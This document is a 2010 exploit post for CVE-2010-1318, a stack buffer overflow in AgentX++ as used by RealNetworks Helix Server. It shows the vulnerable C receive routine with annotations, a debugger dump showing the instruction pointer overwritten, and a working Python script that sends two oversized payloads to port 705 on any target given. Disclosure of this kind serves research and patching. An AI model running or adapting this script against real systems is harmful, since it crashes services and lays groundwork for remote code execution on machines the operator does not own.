AgentX++ Stack Buffer Overflow

`  
  
# Exploit Title: Multiple Vendor AgentX++ Stack Buffer Overflow  
Vulnerability  
# Date: 2010-04-17  
# Author: ZSploit.com  
# Software Link: N/A  
# Version: N/A  
# Tested on: RealNetworks Helix Server v11  
# CVE : CVE-2010-1318  
  
#! /usr/bin/env python  
###############################################################################  
## File : zs_agentx_bof.py  
## Description:  
## :  
## Created_On : Apr 17 2010  
##  
## (c) Copyright 2010, ZSploit.com. all rights reserved.  
###############################################################################  
"""  
int AgentX::receive_agentx(int sd, AgentXPdu& pdu)  
{  
  
u_char buffer[AGENTX_HEADER_LEN+1]; [1]  
u_int payloadLen;  
boolean netByteOrder;  
int status;  
  
// read header  
unsigned int bytesRead = 0;  
while (bytesRead < AGENTX_HEADER_LEN) { [2]  
#ifdef WIN32  
if ((status = recv(sd, (char*)(buffer+bytesRead),  
AGENTX_HEADER_LEN, 0)) <= 0) {  
  
if (status == 0) return AGENTX_DISCONNECT;  
if (status == SOCKET_ERROR) {  
LOG_BEGIN(ERROR_LOG | 1);  
LOG("AgentX: receive socket error (errno)");  
LOG(WSAGetLastError());  
LOG_END;  
return AGENTX_DISCONNECT;  
}  
else {  
LOG_BEGIN(ERROR_LOG | 1);  
LOG("AgentX: receive unknown error (status)");  
LOG(status);  
LOG_END;  
return AGENTX_DISCONNECT;  
}  
}  
#else  
if ((status = read(sd, (void *)(buffer+bytesRead),  
AGENTX_HEADER_LEN)) <= 0) {  
  
if (status == 0) return AGENTX_DISCONNECT;  
if (errno == EBADF) return AGENTX_BADF;  
else {  
LOG_BEGIN(ERROR_LOG | 1);  
LOG("AgentX: receive unknown error (errno)");  
LOG(errno);  
LOG_END;  
return AGENTX_ERROR;  
}  
}  
#endif  
bytesRead += status;  
}  
  
  
[1] Allocates 0x14 bytes stack buffer  
[2] The check should be consider the remainder bytes of the buffer  
  
if we only send the data < 0x13 bytes, 2 packets will overwrite the stack  
buffer.  
  
0:009> g  
(728.a3c): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
eax=fffffff6 ebx=00000000 ecx=00161230 edx=7c8285ec esi=00cbfd14  
edi=00ccff80  
eip=41414141 esp=00cbfd08 ebp=41414141 iopl=0 nv up ei pl nz na po  
nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000  
efl=00010202  
41414141 ?? ???  
*** ERROR: Symbol file could not be found. Defaulted to export symbols for  
C:\WINDOWS\system32\mswsock.dll -  
0:006> k  
ChildEBP RetAddr  
WARNING: Frame IP not in any known module. Following frames may be wrong.  
00cbfd04 00edda20 0x41414141  
00cbfd18 7c829fb5 0xedda20  
00cbfd24 7c829f3d ntdll!RtlGetNtGlobalFlags+0x38  
00cbfe0c 71b21a03 ntdll!RtlFreeHeap+0x126  
00000000 00000000 mswsock+0x1a03  
  
"""  
  
import sys  
import socket  
  
if (len(sys.argv) != 2):  
print "Usage:\t%s [target]" % sys.argv[0]  
sys.exit(0)  
  
  
data = "A" * 19  
  
host = sys.argv[1]  
port = 705  
  
print "PoC for CVE-2010-1318 by ZSploit.com"  
try:  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
try:  
s.connect((host, port))  
print "Sending payload .."  
s.send(data)  
s.send(data)  
except:  
print "Error in send"  
print "Done"  
except:  
print "Error in socket"  
  
  
  
`